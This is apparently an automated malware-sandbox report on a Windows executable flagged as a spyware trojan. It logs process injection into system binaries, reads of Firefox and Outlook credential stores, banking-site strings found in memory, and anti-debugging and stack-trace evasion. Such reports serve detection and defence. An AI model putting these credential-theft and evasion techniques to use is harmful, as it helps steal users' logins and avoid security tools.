            Source: GJRX21GBj3.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9966439773787313
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/1@12/8
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658562B30 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF658562B30
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Temp\H0840I45Jump to behavior
            Source: GJRX21GBj3.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: findstr.exe, 00000007.00000002.3924355546.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520892415.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520776219.0000000003279000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: GJRX21GBj3.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeFile read: C:\Users\user\Desktop\GJRX21GBj3.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\GJRX21GBj3.exe "C:\Users\user\Desktop\GJRX21GBj3.exe"
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: GJRX21GBj3.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: GJRX21GBj3.exeStatic file information: File size 1951744 > 1048576
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: GJRX21GBj3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: GJRX21GBj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: GJRX21GBj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: GJRX21GBj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: GJRX21GBj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: GJRX21GBj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: GJRX21GBj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: GJRX21GBj3.exeStatic PE information: section name: .managed
            Source: GJRX21GBj3.exeStatic PE information: section name: hydrated
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004017BF push ds; iretd 4_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0040A8C2 push ss; iretd 4_2_0040A921
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0041A881 push esp; iretd 4_2_0041A882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0041E8B7 push ss; ret 4_2_0041E8BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004051A1 push ebp; ret 4_2_004051A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004019BF push ds; iretd 4_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00401B31 push ds; iretd 4_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00403500 push eax; ret 4_2_00403502
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0041CD8C push edx; iretd 4_2_0041CD8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00407643 pushfd ; iretd 4_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00407638 pushfd ; iretd 4_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0041A763 push esi; iretd 4_2_0041A767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058809AD push ecx; mov dword ptr [esp], ecx4_2_058809B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036809AD push ecx; mov dword ptr [esp], ecx7_2_036809B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E57260 push esi; iretd 7_2_02E57264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E57247 push esi; iretd 7_2_02E57264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5B3B4 push ss; ret 7_2_02E5B3BA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E473BF push ss; iretd 7_2_02E4741E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5737E push esp; iretd 7_2_02E5737F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E620DD push cs; ret 7_2_02E620DE
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E44140 pushfd ; iretd 7_2_02E44157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E44135 pushfd ; iretd 7_2_02E44157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5711C push esi; iretd 7_2_02E57264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E60BB3 push cs; ret 7_2_02E60BB4
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E59889 push edx; iretd 7_2_02E5988A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5FE8D push es; iretd 7_2_02E5FE8E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E41C9E push ebp; ret 7_2_02E41C9F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03494072 push eax; iretd 7_2_03494078
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03499808 push ebx; ret 7_2_0349989F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_034A2822 push eax; ret 7_2_034A2824
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03490E84 push ecx; retf 7_2_03490E85
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory allocated: 29B95880000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 2128Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 7845Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15772
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep count: 2128 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep time: -4256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep count: 7845 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep time: -15690000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe TID: 1856Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose,7_2_02E5BF10
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658562760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF658562760
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3924911559.000000000141A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: H0840I45.7.drBinary or memory string: discord.comVMware20,11696428655f
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: GJRX21GBj3.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: H0840I45.7.drBinary or memory string: global block list test formVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: H0840I45.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: H0840I45.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: H0840I45.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: H0840I45.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: H0840I45.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: H0840I45.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: H0840I45.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: firefox.exe, 0000000B.00000002.2629405691.0000016FA869D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK?+P
            Source: H0840I45.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: H0840I45.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: H0840I45.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00417A33 LdrLoadDll,4_2_00417A33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B4588 mov eax, dword ptr fs:[00000030h]4_2_058B4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h]4_2_0590B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h]4_2_0590B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882582 mov eax, dword ptr fs:[00000030h]4_2_05882582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882582 mov ecx, dword ptr fs:[00000030h]4_2_05882582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE59C mov eax, dword ptr fs:[00000030h]4_2_058BE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F5BE mov eax, dword ptr fs:[00000030h]4_2_0593F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h]4_2_058A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h]4_2_058A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
